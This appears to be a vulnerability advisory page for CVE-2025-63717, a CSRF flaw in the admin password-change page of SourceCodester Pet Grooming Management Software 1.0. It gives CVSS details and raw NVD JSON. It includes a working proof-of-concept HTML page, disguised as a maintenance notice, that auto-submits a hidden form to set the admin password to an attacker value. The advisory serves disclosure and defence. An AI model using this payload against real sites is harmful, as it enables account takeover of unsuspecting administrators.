Security Vulnerability Report
中文
CVE-2025-63717 CVSS 6.5 MEDIUM

CVE-2025-63717

Published: 2025-11-07 19:16:26
Last Modified: 2025-11-17 18:40:18

Description

The change password functionality at /pet_grooming/admin/change_pass.php in SourceCodester Pet Grooming Management Software 1.0 is vulnerable to Cross-Site Request Forgery (CSRF) attacks. The application does not implement adequate anti-CSRF tokens or same-site cookie restrictions, allowing attackers to trick authenticated users into unknowingly changing their passwords.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mayurik:pet_grooming_management_software:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Pet Grooming Management Software 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-63717 --> <!-- Auto-submit form to change admin password --> <!DOCTYPE html> <html> <head> <title>Page Under Maintenance</title> </head> <body> <h1>Website is under maintenance</h1> <p>Please wait...</p> <form id="csrf_form" action="http://target.com/pet_grooming/admin/change_pass.php" method="POST"> <input type="hidden" name="current_pass" value=""> <input type="hidden" name="new_pass" value="AttackerControlled123!"> <input type="hidden" name="confirm_pass" value="AttackerControlled123!"> <input type="hidden" name="change" value="submit"> </form> <script> // Auto-submit form when page loads document.getElementById('csrf_form').submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63717", "sourceIdentifier": "[email protected]", "published": "2025-11-07T19:16:26.387", "lastModified": "2025-11-17T18:40:18.373", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The change password functionality at /pet_grooming/admin/change_pass.php in SourceCodester Pet Grooming Management Software 1.0 is vulnerable to Cross-Site Request Forgery (CSRF) attacks. The application does not implement adequate anti-CSRF tokens or same-site cookie restrictions, allowing attackers to trick authenticated users into unknowingly changing their passwords."}, {"lang": "es", "value": "La funcionalidad de cambio de contraseña en /pet_grooming/admin/change_pass.php en SourceCodester Pet Grooming Management Software 1.0 es vulnerable a ataques de falsificación de petición en sitios cruzados (CSRF). La aplicación no implementa tokens anti-CSRF adecuados o restricciones de cookie de mismo sitio, lo que permite a los atacantes engañar a usuarios autenticados para que cambien sus contraseñas sin saberlo."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mayurik:pet_grooming_management_software:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "B88D324D-B780-4D8D-BE43-829227D2808F"}]}]}], "references": [{"url": "https://github.com/floccocam-cpu/CVE-Research-2025/blob/main/CVE-2025-63717/README6.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/php/18340/pet-grooming-management-software-download.html", "source": "[email protected]", "tags": ["Product"]}]}}